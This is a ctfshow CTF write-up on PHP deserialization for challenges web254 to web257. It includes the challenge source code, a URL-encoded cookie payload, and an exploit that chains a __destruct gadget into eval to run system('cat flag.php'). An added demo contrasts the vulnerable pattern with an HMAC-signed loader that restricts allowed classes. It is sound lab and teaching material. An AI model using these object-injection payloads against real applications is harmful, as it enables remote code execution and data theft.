[ctfshow web] deserialization
2022-07-26 16:58:00 【narukuuuu】
Knowledge reserve
PHP magic methods:
__sleep()       // called first when serialize() runs on the object
__wakeup()      // called immediately after unserialize() (bypass: if the property count in the serialized string does not match the actual number of properties, __wakeup() is skipped)
__construct()   // triggered when the object is created; initializes it
__destruct()    // triggered when the object is destroyed
__toString()    // triggered when the object is used as a string
__call()        // triggered when an inaccessible method is called in object context
__callStatic()  // triggered when an inaccessible method is called in static context
__get()         // triggered when reading a member variable; used to read inaccessible properties (private properties, or properties that do not exist in the class)
__set()         // triggered when writing to an inaccessible property
__isset()       // triggered when isset() or empty() is called on an inaccessible property
__unset()       // triggered when unset() is called on an inaccessible property
__invoke()      // triggered when the object is called as a function
Serializing objects:
private variables are serialized as:    \x00ClassName\x00variableName
protected variables are serialized as:  \x00*\x00variableName
public variables are serialized as:     variableName
web254
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = new ctfShowUser();
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

This one doesn't seem to involve deserialization at all; it just exercises classes and function calls.
Constructed payload:
?username=xxxxxx&password=xxxxxx

web255
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');

class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}
Here the object is obtained by deserialization (serialization saves an object as a string; deserialization restores the string to an object). The object comes from the user cookie, so a serialized-object payload can be placed there. checkVip() then has to return true, after which vipOneKeyGetFlag() prints the flag.
Because the double quote " in a cookie value acts as a truncation character, the payload has to be URL-encoded to get past it.
<?php
class ctfShowUser{
    public $isVip=true;
}
$a= serialize(new ctfShowUser());
echo urlencode($a);
?>
The resulting cookie payload:
O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
Intercept the request, pass username and password as GET parameters, and set the user cookie to the payload.
This yields the flag.
web256
No different from web255, except that username and password are required to be different.
web257
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
highlight_file(__FILE__);

class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}
Analysis:
1) Code audit first. Nowhere is the flag output directly, but class backDoor contains eval, so the flag file presumably has to be read through command execution. The __destruct() of ctfShowUser calls $this->class->getInfo(), and $code in backDoor is a variable we control.
2) A class nested inside another class has to be initialized; __construct() does that, since it is called automatically when the object is created. When all operations are finished the object is released, which triggers the __destruct() magic method.
So we only need __construct() to initialize $class to a backDoor object, which gives us command execution: after deserialization, __destruct() runs and ends up in eval($this->code).
exp:
<?php
class ctfShowUser{
    private $username= '1';
    private $password= '1';
    private $isVip= false;
    private $class;

    public function __construct(){
        $this->class=new backDoor();
    }
}

class backDoor{
    private $code="system('cat flag.php');";
}

$b=new ctfShowUser();
echo urlencode(serialize($b));
?>
Pass username=1&password=1 as GET parameters and set the constructed user cookie to get the flag.
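As an added example that is not part of the original write-up or the ctfshow challenge code: the three property encodings listed under "Serializing objects", the reason the web255 cookie has to be URL-encoded, and the cookie-unserialize pattern that web255/web257 abuse, placed beside a hardened loader that signs the cookie and restricts unserialize() to the expected class. The ctfShowUser and backDoor classes, the cookie strings and the key are all constructed for this demo.

```php
<?php
// Added demo (not ctfshow code): the cookie-unserialize pattern of web255/web257
// beside a hardened loader. Classes, cookie strings and $key are constructed.
class ctfShowUser {
    private   $username = 'xxxxxx';   // on the wire: s:21:"\0ctfShowUser\0username"
    protected $password = 'xxxxxx';   // on the wire: s:11:"\0*\0password"
    public    $isVip    = false;      // on the wire: s:5:"isVip"
}
class backDoor {                       // stand-in for the web257 gadget class
    public function __destruct() { echo "backDoor::__destruct ran\n"; }
}

// The \x00 bytes count toward the s:N: length and must travel as %00 in a cookie.
$wire = serialize(new ctfShowUser());
echo $wire, "\n", urlencode($wire), "\n";

// Vulnerable (web255/web257): every class named in the string is instantiated,
// so a backDoor object smuggled in the cookie runs its __destruct when freed.
function loadUserUnsafe(string $cookie) {
    return unserialize(urldecode($cookie));   // PHP decodes $_COOKIE itself; done by hand here
}

// Hardened: the cookie must carry a valid HMAC, and only the expected class may
// be instantiated. Any other class becomes __PHP_Incomplete_Class, whose
// methods (including __destruct) never execute.
function loadUserSafe(string $cookie, string $key): ?ctfShowUser {
    $parts = explode('|', $cookie, 2);           // urlencode() never emits '|'
    if (count($parts) !== 2) {
        return null;                             // unsigned cookie
    }
    [$payload, $mac] = $parts;
    if (!hash_equals(hash_hmac('sha256', $payload, $key), $mac)) {
        return null;                             // forged or tampered
    }
    $obj = unserialize(urldecode($payload), ['allowed_classes' => ['ctfShowUser']]);
    return $obj instanceof ctfShowUser ? $obj : null;
}

function signCookie(string $payload, string $key): string {
    return $payload . '|' . hash_hmac('sha256', $payload, $key);
}

$key    = 'demo-only-key';                       // real key stays server-side
$forged = urlencode('O:8:"backDoor":0:{}');     // hand-built, as in the web257 exploit
loadUserUnsafe($forged);                         // prints "backDoor::__destruct ran"
var_dump(loadUserSafe($forged, $key));           // NULL: unsigned
var_dump(loadUserSafe(signCookie($forged, $key), $key));                  // NULL: wrong class
var_dump(loadUserSafe(signCookie(urlencode($wire), $key), $key) instanceof ctfShowUser); // bool(true)
```

Run it with the php CLI: the unsafe loader lets the gadget's __destruct fire, while the hardened loader returns NULL for both the unsigned cookie and the signed cookie that names the wrong class.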
web258
Not fully understood yet; will look at it tomorrow.